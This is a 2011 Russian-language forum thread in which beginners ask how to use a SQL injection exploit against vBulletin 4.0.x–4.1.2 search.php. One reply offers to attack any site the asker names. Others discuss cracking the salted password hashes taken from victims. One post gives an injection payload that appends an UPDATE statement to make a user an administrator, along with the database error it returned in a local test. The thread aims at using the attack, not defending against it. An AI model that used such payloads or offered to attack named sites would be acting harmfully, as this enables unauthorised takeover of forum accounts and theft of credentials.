HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу vBulletin 4.0.x => 4.1.2 exploit помощ нужна!
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.06.2011, 12:27
Smesh
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию
Мне нужна помоч как уптреблят етот експлоит, кто нибудь помогите мне ,я новичок

vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
 
Ответить с цитированием

  #2  
Старый 07.06.2011, 15:18
C-r-A-c-K
Guest
Сообщений: n/a
Провел на форуме:
3913

Репутация: 1
По умолчанию
говори адрес сайта, помогу)
 
Ответить с цитированием

  #3  
Старый 08.06.2011, 01:37
ra0cg
Участник форума
Регистрация: 09.11.2008
Сообщений: 206
Провел на форуме:
1638275

Репутация: 539
Отправить сообщение для ra0cg с помощью ICQ
По умолчанию
Цитата:
Сообщение от Smesh  
Smesh said:
Мне нужна помоч как уптреблят етот експлоит, кто нибудь помогите мне ,я новичок
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
Как вариант, просмотри видео "как уптреблят етот експлоит", к примеру с YouTube.
 
Ответить с цитированием

  #4  
Старый 16.06.2011, 12:19
Sh0ck3R
Новичок
Регистрация: 03.05.2010
Сообщений: 0
Провел на форуме:
2717

Репутация: 0
По умолчанию
В каком формате получается пароль?(чтобы расшифровать)
 
Ответить с цитированием

  #5  
Старый 16.06.2011, 12:37
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию
Скорей всего в формате соленого хеша.

На форуме есть тема, попробуй закинуть хеши туда, может, расшифруют.
 
Ответить с цитированием

  #6  
Старый 20.06.2011, 15:01
Export
Новичок
Регистрация: 13.02.2010
Сообщений: 0
Провел на форуме:
3855

Репутация: 0
По умолчанию
Какие еще запросы можно сделать?

На все запросы вылазит ошибка

Код:
Code:
Database error in vBulletin 4.1.2:

Invalid SQL:
SELECT DISTINCT socialgroupcategory.title from socialgroupcategory AS
				socialgroupcategory WHERE socialgroupcategoryid IN (1) UPDATE `user` SET usergroupid = '2'  WHERE userid = '2';);

MySQL Error   : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UPDATE `user` SET usergroupid = '2'  WHERE userid = '2';)' at line 2
Error Number  : 1064
Request Date  : Monday, June 20th 2011 @ 03:57:50 PM
Error Date    : Monday, June 20th 2011 @ 03:57:50 PM
Script        : http://localhost/search.php?do=process
Referrer      : http://localhost/search.php
IP Address    : 127.0.0.1
Username      : 
Classname     : vB_Database
MySQL Version : 5.1.40-community
Запрос SQL такой

Код:
Code:
&cat[0]=1) UPDATE user SET usergroupid=6 WHERE userid=2#
В чем моя ошибка?

PS Через Execute batch file в Navicat'e запрос проходит.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ